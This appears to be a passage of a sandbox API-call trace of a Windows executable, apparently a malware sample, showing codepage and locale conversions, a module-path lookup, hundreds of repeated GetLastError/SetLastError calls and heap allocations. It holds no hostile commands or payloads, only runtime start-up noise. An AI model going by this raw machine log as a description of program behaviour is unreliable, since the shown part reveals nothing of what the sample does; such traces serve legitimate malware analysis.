lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.616] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0037.616] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0037.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯@¬¸ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0037.616] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4ad2e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.616] SetLastError (dwErrCode=0x0) [0037.616] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.617] GetLastError () returned 0x0 [0037.617] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.618] SetLastError (dwErrCode=0x0) [0037.618] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.619] SetLastError (dwErrCode=0x0) [0037.619] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.620] SetLastError (dwErrCode=0x0) [0037.620] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.621] SetLastError (dwErrCode=0x0) [0037.621] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.622] SetLastError (dwErrCode=0x0) [0037.622] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81) returned 0x6707d8 [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.623] SetLastError (dwErrCode=0x0) [0037.623] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.624] SetLastError (dwErrCode=0x0) [0037.624] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.625] GetLastError () returned 0x0 [0037.625] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.626] SetLastError (dwErrCode=0x0) [0037.626] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.627] SetLastError (dwErrCode=0x0) [0037.627] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.628] SetLastError (dwErrCode=0x0) [0037.628] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] GetLastError () returned 0x0 [0037.629] SetLastError (dwErrCode=0x0) [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x98) returned 0x670868 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1f) returned 0x671828 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x36) returned 0x670908 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x37) returned 0x673d10 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3c) returned 0x673d50 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x31) returned 0x673d98 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x673dd8 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x673df8 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x14) returned 0x673e28 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xd) returned 0x670b20 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x25) returned 0x673e48 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x39) returned 0x673e78 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x673ec0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x673ee0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xe) returned 0x670b38 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x69) returned 0x673f00 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3e) returned 0x673f78 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1b) returned 0x671850 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1d) returned 0x671878 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x48) returned 0x672aa0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x12) returned 0x673fc0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x672af0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1b) returned 0x6718a0 [0037.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x672b10 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x29) returned 0x672b40 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1e) returned 0x6718c8 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x41) returned 0x672b78 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x672bc8 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xf) returned 0x670b50 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x16) returned 0x672be8 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x672c08 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x29) returned 0x672c40 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x15) returned 0x672c78 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1e) returned 0x6718f0 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x672c98 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x12) returned 0x672cd0 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x672cf0 [0037.630] 